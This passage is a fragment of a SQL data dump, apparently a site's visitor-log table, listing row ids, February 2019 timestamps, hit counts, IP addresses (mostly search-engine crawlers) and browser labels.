0,0,'8.29.198.27','other'),(384447,1549760923,1,1,0,0,'95.163.255.194','other'),(384448,1549760927,1,1,0,0,'54.36.148.108','other'),(384449,1549760989,1,1,0,0,'46.229.168.136','other'),(384450,1549761481,1,1,0,0,'216.244.66.241','other'),(384451,1549761748,1,1,0,0,'207.46.13.195','other'),(384452,1549761758,1,1,0,0,'54.36.148.67','other'),(384453,1549761949,1,1,0,0,'54.36.149.58','other'),(384454,1549762241,1,1,0,0,'54.36.149.50','other'),(384455,1549762331,1,1,0,0,'66.249.66.154','chrome'),(384456,1549762457,2,2,0,0,'66.249.66.156','chrome'),(384457,1549762591,1,1,0,0,'46.229.168.134','other'),(384458,1549762754,1,1,0,0,'54.36.149.10','other'),(384459,1549762994,2,2,0,0,'40.77.167.91','other'),(384460,1549763100,1,1,0,0,'40.77.167.132','other'),(384461,1549763701,1,1,0,0,'54.36.148.225','other'),(384462,1549763917,1,1,0,0,'207.46.13.195','other'),(384463,1549764067,1,1,0,0,'54.36.149.2','other'),(384464,1549764135,2,2,0,0,'66.249.66.156','chrome'),(384465,1549764226,1,1,0,0,'66.249.66.154','chrome'),(384466,1549764424,1,1,0,0,'66.249.66.42','chrome'),(384467,1549764573,1,1,0,0,'54.36.148.247','other'),(384468,1549764574,1,1,0,0,'54.36.148.159','other'),(384469,1549764980,1,1,0,0,'40.77.167.91','other'),(384470,1549765072,1,1,0,0,'66.249.66.152','chrome'),(384471,1549765240,1,1,0,0,'66.249.66.156','chrome'),(384472,1549765340,1,1,0,0,'66.249.66.154','chrome'),(384473,1549765479,1,1,0,0,'54.36.148.226','other'),(384474,1549765530,1,1,0,0,'66.249.66.42','chrome'),(384475,1549765962,1,1,0,0,'66.249.66.44','chrome'),(384476,1549766192,1,1,0,0,'54.36.148.29','other'),(384477,1549766236,1,1,0,0,'54.36.149.35','other'),(384478,1549766575,2,2,0,0,'66.249.66.152','chrome'),(384479,1549766950,1,1,0,0,'40.77.167.132','other'),(384480,1549767014,1,1,0,0,'46.229.168.146','other'),(384481,1549767103,1,1,0,0,'66.249.66.156','chrome'),(384482,1549767169,1,1,0,0,'157.55.39.235','other'),(384483,1549767600,1,1,0,0,'46.229.168.138','other'),(384484,1549767860,1,1,0,0,'66.249.66.154','chrome'),(384485,1549768102,2,2,0,0,'66.249.66.156','chrome'),(384486,1549768140,1,1,0,0,'54.36.149.55','other'),(384487,1549768191,1,1,0,0,'54.36.149.60','other'),(384488,1549768281,1,1,0,0,'54.36.148.104','other'),(384489,1549768435,1,1,0,0,'207.46.13.10','other'),(384490,1549768537,1,1,0,0,'46.229.168.143','other'),(384491,1549768944,1,1,0,0,'54.36.148.247','other'),(384492,1549769062,3,3,0,0,'66.249.66.154','chrome'),(384493,1549769243,2,2,0,0,'66.249.66.156','chrome'),(384494,1549769373,1,1,0,0,'95.163.255.92','other'),(384495,1549769447,1,1,0,0,'54.36.148.37','other'),(384496,1549769482,1,1,0,0,'216.244.66.241','other'),(384497,1549769484,1,1,0,0,'54.36.149.87','other'),(384498,1549769989,2,2,0,0,'66.249.66.152','chrome'),(384499,1549770199,1,1,0,0,'8.29.198.27','other'),(384500,1549770492,1,1,0,0,'157.55.39.93','other'),(384501,1549770866,1,1,0,0,'54.36.148.97','other'),(384502,1549771216,1,1,0,0,'40.77.167.51','other'),(384503,1549771315,2,2,0,0,'66.249.66.152','chrome'),(384504,1549771323,1,1,0,0,'46.229.168.153','other'),(384505,1549771465,1,1,0,0,'66.249.66.154','chrome'),(384506,1549771475,1,1,0,0,'157.55.39.93','other'),(384507,1549771651,1,1,0,0,'8.29.198.25','other'),(384508,1549772437,1,1,0,0,'66.249.66.156','chrome'),(384509,1549772633,2,2,0,0,'66.249.66.152','chrome'),(384510,1549772673,1,1,0,0,'54.36.148.235','other'),(384511,1549772996,1,1,0,0,'46.229.168.146','other'),(384512,1549773032,1,1,0,0,'66.249.66.42','chrome'),(384513,1549773236,1,1,0,0,'66.249.66.154','chrome'),(384514,1549773359,1,1,0,0,'46.229.168.130','other'),(384515,1549773652,1,1,0,0,'95.24.11.174','chrome'),(384516,1549773733,1,1,0,0,'46.229.168.141','other'),(384517,1549774557,1,1,0,0,'54.36.149.87','other'),(384518,1549774756,1,1,0,0,'66.249.66.44','chrome'),(384519,1549774786,1,1,0,0,'157.55.39.93','other'),(384520,1549774800,1,1,0,0,'54.36.148.123','other'),(384521,1549775064,1,1,0,0,'66.249.66.40','chrome'),(384522,1549775110,1,1,0,0,'46.229.168.129','other'),(384523,1549775388,1,1,0,0,'54.36.148.236','other'),(384524,1549775512,1,1,0,0,'46.229.168.132','other'),(384525,1549775623,1,1,0,0,'54.36.149.3','other'),(384526,1549775651,2,2,0,0,'54.187.214.234','chrome'),(384527,1549777355,3,3,0,0,'216.244.66.241','other'),(384528,1549777670,1,1,0,0,'54.36.148.161','other'),(384529,1549778040,1,1,0,0,'91.196.178.135','firefox'),(384530,1549778084,1,1,0,0,'54.36.148.80','other'),(384531,1549778450,1,1,0,0,'54.36.148.28','other'),(384532,1549778454,1,1,0,0,'54.36.149.92','other'),(384533,1549778673,1,1,0,0,'66.249.66.44','chrome'),(384534,1549778787,2,2,0,0,'66.249.66.156','chrome'),(384535,1549779317,1,1,0,0,'54.36.149.69','other'),(384536,1549779373,1,1,0,0,'54.36.148.56','other'),(384537,1549779857,1,1,0,0,'66.249.66.156','chrome'),(384538,1549779884,4,4,0,0,'66.249.66.152','chrome'),(384539,1549779921,1,1,0,0,'54.36.149.101','other'),(384540,1549780001,1,1,0,0,'54.36.148.197','other'),(384541,1549780479,1,1,0,0,'66.249.66.40','chrome'),(384542,1549780701,1,1,0,0,'54.36.149.66','other'),(384543,1549780962,4,4,0,0,'66.249.66.44','chrome'),(384544,1549780977,1,1,0,0,'66.249.66.154','chrome'),(384545,1549781046,1,1,0,0,'8.29.198.26','other'),(384546,1549781117,1,1,0,0,'157.55.39.93','other'),(384547,1549781364,1,1,0,0,'157.55.39.135','other'),(384548,1549781369,1,1,0,0,'54.36.148.240','other'),(384549,1549781580,1,1,0,0,'46.229.168.143','other'),(384550,1549781656,1,1,0,0,'54.36.148.102','other'),(384551,1549781760,1,1,0,0,'157.55.39.153','other'),(384552,1549782029,1,1,0,0,'66.249.66.156','chrome'),(384553,1549782200,1,1,0,0,'46.211.47.181','chrome'),(384554,1549782277,2,2,0,0,'216.244.66.241','other'),(384555,1549782404,1,1,0,0,'54.36.148.117','other'),(384556,1549782405,1,1,0,0,'54.36.149.86','other'),(384557,1549782439,1,1,0,0,'66.249.66.44','chrome'),(384558,1549782490,1,1,0,0,'8.29.198.27','other'),(384559,1549782593,1,1,0,0,'46.229.168.142','other'),(384560,1549782757,1,1,0,0,'54.36.149.5','other'),(384561,1549783198,1,1,0,0,'46.229.168.132','other'),(384562,1549783296,1,1,0,0,'66.249.66.152','chrome'),(384563,1549783635,1,1,0,0,'13.66.139.0','other'),(384564,1549783733,1,1,0,0,'46.229.168.129','other'),(384565,1549784041,1,1,0,0,'54.36.148.18','other'),(384566,1549784837,1,1,0,0,'54.36.148.45','other'),(384567,1549785019,1,1,0,0,'54.36.148.185','other'),(384568,1549785329,2,2,0,0,'66.249.66.42','chrome'),(384569,1549785378,1,1,0,0,'46.229.168.138','other'),(384570,1549785409,1,1,0,0,'66.249.66.44','chrome'),(384571,1549785438,2,2,0,0,'66.249.66.40','chrome'),(384572,1549785468,1,1,0,0,'66.249.66.156','chrome'),(384573,1549785496,1,1,0,0,'46.229.168.137','other'),(384574,1549785626,1,1,0,0,'46.229.168.136','other'),(384575,1549785821,1,1,0,0,'216.244.66.241','other'),(384576,1549786028,1,1,0,0,'54.36.148.218','other'),(384577,1549786125,1,1,0,0,'54.36.148.234','other'),(384578,1549786273,1,1,0,0,'66.249.66.152','chrome'),(384579,1549786340,1,1,0,0,'157.55.39.93','other'),(384580,1549786956,1,1,0,0,'54.36.148.30','other'),(384581,1549786987,1,1,0,0,'207.46.13.203','other'),(384582,1549787011,2,2,0,0,'66.249.66.154','chrome'),(384583,1549787139,1,1,0,0,'141.8.142.38','other'),(384584,1549787457,1,1,0,0,'54.36.148.27','other'),(384585,1549787821,1,1,0,0,'46.229.168.148','other'),(384586,1549787897,1,1,0,0,'66.249.66.156','chrome'),(384587,1549787933,1,1,0,0,'66.249.66.152','chrome'),(384588,1549787951,1,1,0,0,'157.55.39.93','other'),(384589,1549788222,3,3,0,0,'216.244.66.241','other'),(384590,1549788477,1,1,0,0,'54.36.148.255','other'),(384591,1549788545,1,1,0,0,'207.46.13.100','other'),(384592,1549788884,1,1,0,0,'178.154.244.65','other'),(384593,1549789015,1,1,0,0,'180.76.15.6','other'),(384594,1549789036,1,1,0,0,'54.36.148.46','other'),(384595,1549789264,1,1,0,0,'54.36.148.185','other'),(384596,1549790316,1,1,0,0,'66.249.66.152','chrome'),(384597,1549790628,2,2,0,0,'216.244.66.241','other'),(384598,1549790729,1,1,0,0,'54.36.148.159','other'),(384599,1549790773,1,1,0,0,'46.229.168.149','other'),(384600,1549790900,1,1,0,0,'157.55.39.123','other'),(384601,1549790988,1,1,0,0,'54.36.148.176','other'),(384602,1549791215,1,1,0,0,'207.46.13.100','other'),(384603,1549791522,1,1,0,0,'66.249.66.156','chrome'),(384604,1549791576,1,1,0,0,'54.36.149.71','other'),(384605,1549791878,1,1,0,0,'8.29.198.26','other'),(384606,1549792150,1,1,0,0,'54.36.148.34','other'),(384607,1549792377,1,1,0,0,'54.36.148.136','other'),(384608,1549792607,2,2,0,0,'46.229.168.144','other'),(384609,1549792860,1,1,0,0,'54.36.148.55','other'),(384610,1549793327,1,1,0,0,'8.29.198.26','other'),(384611,1549793594,1,1,0,0,'207.46.13.203','other'),(384612,1549793631,1,1,0,0,'54.36.148.177','other'),(384613,1549793880,1,1,0,0,'54.36.148.61','other'),(384614,1549794190,1,1,0,0,'54.36.149.19','other'),(384615,1549794239,1,1,0,0,'46.211.129.128','other'),(384616,1549794247,1,1,0,0,'54.36.148.80','other'),(384617,1549794297,2,2,0,0,'66.249.66.154','chrome'),(384618,1549794461,1,1,0,0,'157.55.39.180','other'),(384619,1549794560,1,1,0,0,'54.36.148.81','other'),(384620,1549794642,1,1,0,0,'54.36.149.1','other'),(384621,1549794689,1,1,0,0,'37.9.113.20','other'),(384622,1549795033,1,1,0,0,'54.36.148.78','other'),(384623,1549795073,1,1,0,0,'54.36.148.34','other'),(384624,1549795104,1,1,0,0,'54.36.148.85','other'),(384625,1549795149,1,1,0,0,'54.36.148.106','other'),(384626,1549795375,1,1,0,0,'157.55.39.180','other'),(384627,1549795612,1,1,0,0,'54.36.148.245','other'),(384628,1549797996,1,1,0,0,'87.236.20.14','firefox'),(384629,1549798085,1,1,0,0,'207.46.13.203','other'),(384630,1549798156,1,1,0,0,'176.8.89.33','chrome'),(384631,1549798479,1,1,0,0,'157.55.39.180','other'),(384632,1549798600,1,1,0,0,'54.36.149.26','other'),(384633,1549798869,1,1,0,0,'54.36.148.114','other'),(384634,1549798962,1,1,0,0,'54.36.149.81','other'),(384635,1549799059,2,2,0,0,'216.244.66.241','other'),(384636,1549799305,1,1,0,0,'46.229.168.150','other'),(384637,1549799482,1,1,0,0,'54.36.149.68','other'),(384638,1549800048,1,1,0,0,'194.113.106.11','chrome'),(384639,1549800286,1,1,0,0,'54.36.148.29','other'),(384640,1549800920,1,1,0,0,'157.55.39.123','other'),(384641,1549800994,1,1,0,0,'54.36.148.237','other'),(384642,1549801017,1,1,0,0,'54.36.148.67','other'),(384643,1549801145,1,1,0,0,'54.36.148.248','other'),(384644,1549801252,1,1,0,0,'54.36.149.68','other'),(384645,1549801270,1,1,0,0,'54.36.149.50','other'),(384646,1549801348,1,1,0,0,'178.154.244.11','other'),(384647,1549801421,1,1,0,0,'37.9.113.20','other'),(384648,1549801768,2,2,0,0,'216.244.66.241','other'),(384649,1549801966,1,1,0,0,'54.36.148.37','other'),(384650,1549802022,1,1,0,0,'207.46.13.100','other'),(384651,1549802094,1,1,0,0,'66.249.66.44','chrome'),(384652,1549802326,1,1,0,0,'130.180.209.116','chrome'),(384653,1549802331,2,2,0,0,'66.249.83.44','chrome'),(384654,1549802340,1,1,0,0,'66.249.83.42','chrome'),(384656,1549802460,1,1,0,0,'66.249.66.152','chrome'),(384657,1549802483,1,1,0,0,'54.36.148.134','other'),(384658,1549802711,1,1,0,0,'8.29.198.27','other'),(384659,1549803067,1,1,0,0,'66.249.66.156','chrome'),(384660,1549803261,1,1,0,0,'54.36.148.118','other'),(384661,1549803349,1,1,0,0,'40.117.151.38','chrome'),(384662,1549803386,1,1,0,0,'157.55.39.240','other'),(384663,1549803436,1,1,0,0,'54.36.148.212','other'),(384664,1549803604,1,1,0,0,'5.45.207.79','other'),(384665,1549803625,1,1,0,0,'95.163.255.196','other'),(384666,1549803647,1,1,0,0,'54.36.148.78','other'),(384667,1549803903,1,1,0,0,'54.36.148.255','other'),(384668,1549804056,1,1,0,0,'54.36.149.11','other'),(384669,1549804167,1,1,0,0,'8.29.198.27','other'),(384670,1549804209,1,1,0,0,'46.229.168.148','other'),(384671,1549804240,1,1,0,0,'46.229.168.145','other'),(384672,1549804383,1,1,0,0,'216.244.66.241','other'),(384673,1549804562,1,1,0,0,'95.163.255.96','other'),(384674,1549804656,1,1,0,0,'157.55.39.180','other'),(384675,1549805652,1,1,0,0,'95.163.255.196','other'),(384676,1549805918,1,1,0,0,'95.163.255.163','other'),(384677,1549806126,2,2,0,0,'46.229.168.151','other'),(384678,1549806219,1,1,0,0,'46.229.168.148','other'),(384679,1549806269,1,1,0,0,'54.36.148.45','other'),(384680,1549806667,1,1,0,0,'66.249.66.154','chrome'),(384681,1549806858,1,1,0,0,'54.36.149.28','other'),(384682,1549806882,1,1,0,0,'54.36.148.207','other'),(384683,1549807297,3,3,0,0,'216.244.66.241','other'),(384684,1549808123,1,1,0,0,'54.36.149.16','other'),(384685,1549808242,1,1,0,0,'54.36.149.56','other'),(384686,1549808700,1,1,0,0,'54.36.148.113','other'),(384687,1549808789,1,1,0,0,'66.249.66.156','chrome'),(384688,1549809049,1,1,0,0,'66.249.66.154','chrome'),(384689,1549809092,1,1,0,0,'54.36.148.206','other'),(384690,1549809169,1,1,0,0,'66.249.66.152','chrome'),(384691,1549809356,1,1,0,0,'37.9.113.148','other'),(384692,1549809665,1,1,0,0,'157.55.39.240','other'),(384693,1549810126,1,1,0,0,'216.244.66.241','other'),(384694,1549810228,2,2,0,0,'46.229.168.140','other'),(384695,1549810416,1,1,0,0,'54.36.149.69','other'),(384696,1549811014,1,1,0,0,'66.249.66.156','chrome'),(384697,1549811335,1,1,0,0,'46.229.168.141','other'),(384698,1549812011,1,1,0,0,'46.229.168.151','other'),(384699,1549812162,1,1,0,0,'207.46.13.222','other'),(384700,1549812202,1,1,0,0,'95.163.255.168','other'),(384701,1549812243,1,1,0,0,'66.249.66.154','chrome'),(384702,1549812284,1,1,0,0,'66.249.66.152','chrome'),(384703,1549812315,1,1,0,0,'66.249.66.156','chrome'),(384704,1549812363,2,2,0,0,'216.244.66.241','other'),(384705,1549813162,1,1,0,0,'66.249.66.154','chrome'),(384706,1549813560,1,1,0,0,'8.29.198.26','other'),(384707,1549813724,1,1,0,0,'54.36.148.86','other'),(384708,1549814182,1,1,0,0,'92.112.159.229','chrome'),(384709,1549814494,1,1,0,0,'46.133.92.58','chrome'),(384710,1549814624,1,1,0,0,'157.55.39.90','other'),(384711,1549814779,1,1,0,0,'46.229.168.140','other'),(384712,1549814933,1,1,0,0,'46.229.168.152','other'),(384713,1549814992,1,1,0,0,'54.36.149.20','other'),(384714,1549815008,1,1,0,0,'8.29.198.27','other'),(384715,1549815096,1,1,0,0,'157.55.39.254','other'),(384716,1549815112,1,1,0,0,'54.36.148.125','other'),(384717,1549815291,1,1,0,0,'54.36.148.217','other'),(384718,1549815651,1,1,0,0,'157.55.39.77','other'),(384719,1549815908,1,1,0,0,'46.229.168.148','other'),(384720,1549815997,1,1,0,0,'54.36.148.62','other'),(384721,1549816497,2,2,0,0,'66.249.66.44','chrome'),(384722,1549816539,1,1,0,0,'95.163.255.93','other'),(384723,1549816565,1,1,0,0,'54.36.148.74','other'),(384724,1549816602,1,1,0,0,'54.36.149.70','other'),(384725,1549816978,1,1,0,0,'46.211.24.225','chrome'),(384726,1549817390,2,2,0,0,'157.55.39.216','other'),(384727,1549817407,1,1,0,0,'95.163.255.161','other'),(384728,1549817613,1,1,0,0,'178.255.215.94','other'),(384729,1549817906,1,1,0,0,'54.36.149.106','other'),(384730,1549818091,1,1,0,0,'216.244.66.241','other'),(384731,1549818477,1,1,0,0,'54.36.148.129','other'),(384732,1549818947,2,2,0,0,'66.249.66.42','chrome'),(384733,1549819064,1,1,0,0,'157.55.39.254','other'),(384734,1549819106,1,1,0,0,'91.196.178.93','chrome'),(384735,1549819312,1,1,0,0,'31.13.127.20','other'),(384736,1549819316,1,1,0,0,'69.171.251.33','other'),(384737,1549819317,1,1,0,0,'31.13.127.21','other'),(384738,1549819498,1,1,0,0,'54.36.149.79','other'),(384739,1549819545,1,1,0,0,'54.36.148.194','other'),(384740,1549820090,1,1,0,0,'54.36.148.162','other'),(384741,1549820236,2,2,0,0,'66.249.66.156','chrome'),(384742,1549820771,2,2,0,0,'216.244.66.241','other'),(384743,1549821083,1,1,0,0,'54.36.148.197','other'),(384744,1549821119,1,1,0,0,'95.133.238.152','firefox'),(384745,1549821282,1,1,0,0,'157.55.39.254','other'),(384746,1549821358,1,1,0,0,'46.229.168.135','other'),(384747,1549821369,1,1,0,0,'40.77.167.64','other'),(384748,1549821588,1,1,0,0,'54.36.148.85','other'),(384749,1549821676,1,1,0,0,'54.36.148.82','other'),(384750,1549821742,1,1,0,0,'54.36.149.4','other'),(384751,1549822240,1,1,0,0,'54.36.149.53','other'),(384752,1549822346,1,1,0,0,'54.36.148.205','other'),(384753,1549822436,1,1,0,0,'157.55.39.77','other'),(384754,1549822672,1,1,0,0,'66.249.66.156','chrome'),(384755,1549822923,1,1,0,0,'216.244.66.241','other'),(384756,1549823019,1,1,0,0,'54.36.148.43','other'),(384757,1549823232,2,2,0,0,'40.77.167.64','other'),(384758,1549823387,1,1,0,0,'95.135.213.249','chrome'),(384759,1549823452,1,1,0,0,'54.36.148.116','other'),(384760,1549823534,1,1,0,0,'46.229.168.129','other'),(384761,1549823832,1,1,0,0,'54.36.148.89','other'),(384762,1549823916,1,1,0,0,'54.36.148.62','other'),(384763,1549824121,1,1,0,0,'157.55.39.77','other'),(384764,1549824401,1,1,0,0,'8.29.198.25','other'),(384765,1549824443,1,1,0,0,'54.36.148.150','other'),(384766,1549824482,1,1,0,0,'54.36.148.164','other'),(384767,1549824783,1,1,0,0,'54.36.149.51','other'),(384768,1549824987,1,1,0,0,'54.36.148.36','other'),(384769,1549824991,1,1,0,0,'157.55.39.216','other'),(384770,1549825383,1,1,0,0,'46.229.168.150','other'),(384771,1549825597,1,1,0,0,'66.249.66.156','chrome'),(384772,1549825711,1,1,0,0,'40.77.167.154','other'),(384773,1549825845,1,1,0,0,'8.29.198.27','other'),(384774,1549826247,1,1,0,0,'13.66.139.0','other'),(384775,1549826264,3,3,0,0,'216.244.66.241','other'),(384776,1549826298,1,1,0,0,'54.36.149.29','other'),(384777,1549826359,1,1,0,0,'78.137.11.67','firefox'),(384778,1549826475,1,1,0,0,'180.76.15.141','other'),(384779,1549826628,1,1,0,0,'157.55.39.77','other'),(384780,1549826655,1,1,0,0,'54.36.148.107','other'),(384781,1549826689,1,1,0,0,'46.229.168.129','other'),(384782,1549826702,1,1,0,0,'93.74.75.122','other'),(384783,1549827117,1,1,0,0,'54.36.149.103','other'),(384784,1549827216,1,1,0,0,'54.36.149.97','other'),(384785,1549827235,1,1,0,0,'54.36.148.222','other'),(384786,1549827367,1,1,0,0,'54.36.148.200','other'),(384787,1549827418,1,1,0,0,'54.36.148.205','other'),(384788,1549827462,1,1,0,0,'95.163.255.99','other'),(384789,1549827873,2,2,0,0,'40.77.167.64','other'),(384790,1549828153,1,1,0,0,'54.36.148.95','other'),(384791,1549828202,1,1,0,0,'213.3.29.239','chrome'),(384792,1549828209,1,1,0,0,'198.96.210.119','chrome'),(384793,1549828370,1,1,0,0,'95.163.255.96','other'),(384794,1549828465,2,2,0,0,'66.249.66.154','chrome'),(384795,1549828994,1,1,0,0,'66.249.66.152','chrome'),(384796,1549829030,2,2,0,0,'216.244.66.241','other'),(384797,1549829042,1,1,0,0,'54.36.149.17','other'),(384798,1549829274,1,1,0,0,'66.249.66.156','chrome'),(384799,1549830348,1,1,0,0,'40.77.167.154','other'),(384800,1549830386,1,1,0,0,'54.36.148.95','other'),(384801,1549830510,1,1,0,0,'216.244.66.241','other'),(384802,1549830539,1,1,0,0,'54.36.148.83','other'),(384803,1549830890,1,1,0,0,'46.229.168.133','other'),(384804,1549831525,1,1,0,0,'66.249.66.152','chrome'),(384805,1549832672,1,1,0,0,'46.229.168.134','other'),(384806,1549832765,1,1,0,0,'157.55.39.216','other'),(384807,1549832862,1,1,0,0,'54.36.149.27','other'),(384808,1549832995,1,1,0,0,'66.249.66.152','chrome'),(384809,1549833324,105,105,0,0,'192.151.145.82','other'),(384810,1549833467,1,1,0,0,'66.249.66.40','chrome'),(384811,1549833508,1,1,0,0,'46.229.168.136','other'),(384812,1549833568,1,1,0,0,'54.36.148.177','other'),(384813,1549833749,1,1,0,0,'176.36.222.85','chrome'),(384814,1549833758,1,1,0,0,'54.36.149.41','other'),(384815,1549834231,47,47,0,0,'192.151.145.82','other'),(384816,1549834264,6,6,0,0,'216.244.66.241','other'),(384817,1549834345,2,2,0,0,'95.163.255.94','other'),(384818,1549834434,1,1,0,0,'157.55.39.77','other'),(384819,1549834438,1,1,0,0,'66.249.66.156','chrome'),(384820,1549834613,1,1,0,0,'157.55.39.216','other'),(384821,1549834772,1,1,0,0,'46.229.168.133','other'),(384822,1549835238,1,1,0,0,'8.29.198.25','other'),(384823,1549835254,1,1,0,0,'54.36.149.18','other'),(384824,1549835609,1,1,0,0,'46.229.168.129','other'),(384825,1549835799,1,1,0,0,'95.133.17.88','chrome'),(384826,1549835946,1,1,0,0,'46.229.168.147','other'),(384827,1549836009,1,1,0,0,'54.36.149.57','other'),(384828,1549836230,1,1,0,0,'37.115.191.132','chrome'),(384829,1549836680,1,1,0,0,'8.29.198.26','other'),(384830,1549836699,1,1,0,0,'46.229.168.134','other'),(384831,1549836737,1,1,0,0,'54.36.148.184','other'),(384832,1549836824,1,1,0,0,'54.36.148.133','other'),(384833,1549836871,1,1,0,0,'46.229.168.150','other'),(384834,1549837234,1,1,0,0,'216.244.66.241','other'),(384835,1549837330,1,1,0,0,'46.229.168.149','other'),(384836,1549837358,1,1,0,0,'54.36.148.145','other'),(384837,1549838000,1,1,0,0,'217.118.86.60','other'),(384838,1549838780,1,1,0,0,'46.229.168.142','other'),(384839,1549839071,1,1,0,0,'54.36.148.139','other'),(384840,1549839289,1,1,0,0,'54.36.148.234','other'),(384841,1549839298,4,4,0,0,'216.244.66.241','other'),(384842,1549839498,1,1,0,0,'66.249.66.156','chrome'),(384843,1549839669,1,1,0,0,'54.36.148.64','other'),(384844,1549840252,1,1,0,0,'216.244.66.241','other'),(384845,1549840461,1,1,0,0,'95.163.255.94','other'),(384846,1549841489,1,1,0,0,'46.229.168.132','other'),(384847,1549841619,1,1,0,0,'54.36.148.105','other'),(384848,1549841681,1,1,0,0,'46.229.168.130','other'),(384849,1549841731,1,1,0,0,'54.36.149.50','other'),(384850,1549841738,1,1,0,0,'46.229.168.148','other'),(384851,1549841940,1,1,0,0,'54.36.148.43','other'),(384852,1549842267,1,1,0,0,'54.36.149.92','other'),(384853,1549842378,3,3,0,0,'157.55.39.115','other'),(384854,1549842420,1,1,0,0,'54.36.148.117','other'),(384855,1549842808,1,1,0,0,'5.45.207.79','other'),(384856,1549842809,1,1,0,0,'141.8.142.103','other'),(384857,1549842880,1,1,0,0,'207.46.13.87','other'),(384858,1549842882,2,2,0,0,'216.244.66.241','other'),(384859,1549843431,1,1,0,0,'66.249.66.154','chrome'),(384860,1549843686,1,1,0,0,'46.229.168.130','other'),(384861,1549843912,1,1,0,0,'54.36.148.134','other'),(384862,1549844188,1,1,0,0,'54.36.149.37','other'),(384863,1549844280,1,1,0,0,'54.36.148.74','other'),(384864,1549844644,1,1,0,0,'54.36.149.47','other'),(384865,1549844737,1,1,0,0,'207.46.13.87','other'),(384866,1549844804,1,1,0,0,'178.94.172.126','chrome'),(384867,1549844871,3,3,0,0,'216.244.66.241','other'),(384868,1549844913,1,1,0,0,'207.46.13.55','other'),(384869,1549846072,1,1,0,0,'8.29.198.26','other'),(384870,1549846087,2,2,0,0,'207.46.13.87','other'),(384871,1549846390,1,1,0,0,'66.249.66.154','chrome'),(384872,1549846526,1,1,0,0,'46.229.168.140','other'),(384873,1549846531,1,1,0,0,'109.70.100.18','other'),(384874,1549846538,1,1,0,0,'46.229.168.132','other'),(384875,1549846615,1,1,0,0,'180.76.15.153','other'),(384876,1549847305,1,1,0,0,'46.229.168.141','other'),(384877,1549847469,1,0,1,0,'66.249.66.152',''),(384878,1549847519,1,1,0,0,'8.29.198.27','other'),(384879,1549847620,1,1,0,0,'157.55.39.178','other'),(384880,1549847913,1,1,0,0,'66.249.66.152','chrome'),(384881,1549848366,1,1,0,0,'207.46.13.87','other'),(384882,1549848531,1,1,0,0,'157.55.39.161','other'),(384883,1549848573,1,1,0,0,'46.229.168.143','other'),(384884,1549848831,1,1,0,0,'54.36.149.87','other'),(384885,1549850061,2,2,0,0,'216.244.66.241','other'),(384886,1549850068,1,1,0,0,'66.249.66.156','chrome'),(384887,1549850401,1,1,0,0,'54.36.148.28','other'),(384888,1549851100,1,1,0,0,'46.229.168.146','other'),(384889,1549851188,1,1,0,0,'54.36.148.45','other'),(384890,1549851260,1,1,0,0,'66.249.66.156','chrome'),(384891,1549851435,1,1,0,0,'66.249.66.152','chrome'),(384892,1549851495,1,1,0,0,'54.36.148.243','other'),(384893,1549851522,1,1,0,0,'54.36.148.163','other'),(384894,1549851964,1,1,0,0,'95.163.255.99','other'),(384895,1549852048,1,1,0,0,'46.229.168.144','other'),(384896,1549852582,1,1,0,0,'54.36.148.130','other'),(384897,1549852658,1,1,0,0,'66.249.66.152','chrome'),(384898,1549853092,1,1,0,0,'66.249.66.44','chrome'),(384899,1549853258,2,2,0,0,'66.249.66.156','chrome'),(384900,1549853323,1,1,0,0,'54.36.148.60','other'),(384901,1549853364,2,2,0,0,'54.36.149.30','other'),(384902,1549853381,1,1,0,0,'54.36.148.127','other'),(384903,1549854311,1,1,0,0,'46.229.168.130','other'),(384904,1549854920,2,2,0,0,'40.77.167.7','other'),(384905,1549855593,1,1,0,0,'54.36.149.77','other'),(384906,1549855692,1,1,0,0,'54.36.149.63','other'),(384907,1549855752,1,1,0,0,'46.229.168.141','other'),(384908,1549855937,2,2,0,0,'157.55.39.178','other'),(384909,1549856059,1,1,0,0,'54.36.148.45','other'),(384910,1549856136,1,1,0,0,'46.229.168.140','other'),(384911,1549856218,1,1,0,0,'46.229.168.134','other'),(384912,1549856278,2,2,0,0,'216.244.66.241','other'),(384913,1549856557,1,1,0,0,'54.36.148.88','other'),(384914,1549856917,1,1,0,0,'8.29.198.25','other'),(384915,1549857501,1,1,0,0,'54.36.148.138','other'),(384916,1549857797,1,1,0,0,'66.249.66.42','chrome'),(384917,1549858090,1,1,0,0,'46.229.168.130','other'),(384918,1549858239,1,1,0,0,'66.249.66.40','chrome'),(384919,1549858279,1,1,0,0,'66.249.66.152','chrome'),(384920,1549858353,1,1,0,0,'8.29.198.27','other'),(384921,1549858647,1,1,0,0,'40.77.167.7','other'),(384922,1549859009,2,2,0,0,'216.244.66.241','other'),(384923,1549859502,1,1,0,0,'54.36.149.61','other'),(384924,1549859996,1,1,0,0,'54.36.148.244','other'),(384925,1549860018,1,1,0,0,'54.36.148.108','other'),(384926,1549860393,1,1,0,0,'46.229.168.134','other'),(384927,1549860541,1,1,0,0,'40.77.167.82','other'),(384928,1549860907,1,1,0,0,'54.36.149.56','other'),(384929,1549861057,1,1,0,0,'91.196.178.129','firefox'),(384930,1549861089,1,1,0,0,'66.249.66.42','chrome'),(384931,1549861713,1,1,0,0,'54.36.149.78','other'),(384932,1549861991,1,1,0,0,'54.36.149.96','other'),(384933,1549862281,1,1,0,0,'54.36.148.184','other'),(384934,1549862345,1,1,0,0,'66.249.66.154','chrome'),(384935,1549862366,1,1,0,0,'54.36.149.71','other'),(384936,1549862513,1,1,0,0,'66.249.66.156','chrome'),(384937,1549862846,2,2,0,0,'40.77.167.12','other'),(384938,1549863199,1,1,0,0,'54.36.149.98','other'),(384939,1549863253,1,1,0,0,'54.36.148.246','other'),(384940,1549863356,2,2,0,0,'18.237.180.61','chrome'),(384941,1549863398,1,1,0,0,'180.76.15.150','other'),(384942,1549863868,1,1,0,0,'54.36.149.2','other'),(384943,1549863900,1,1,0,0,'95.163.255.99','other'),(384944,1549863997,1,1,0,0,'95.163.255.195','other'),(384945,1549864100,1,1,0,0,'95.163.255.169','other'),(384946,1549864331,2,2,0,0,'216.244.66.241','other'),(384947,1549864405,1,1,0,0,'66.249.66.156','chrome'),(384948,1549864472,1,1,0,0,'54.36.149.98','other'),(384949,1549864473,1,1,0,0,'91.196.178.26','chrome'),(384950,1549864650,1,1,0,0,'54.36.148.203','other'),(384951,1549864701,1,1,0,0,'54.36.148.224','other'),(384952,1549864865,1,1,0,0,'54.36.148.199','other'),(384953,1549865097,1,1,0,0,'40.77.167.126','other'),(384954,1549865239,1,1,0,0,'54.36.148.152','other'),(384955,1549865327,1,1,0,0,'54.36.148.180','other'),(384956,1549865505,1,1,0,0,'66.249.66.1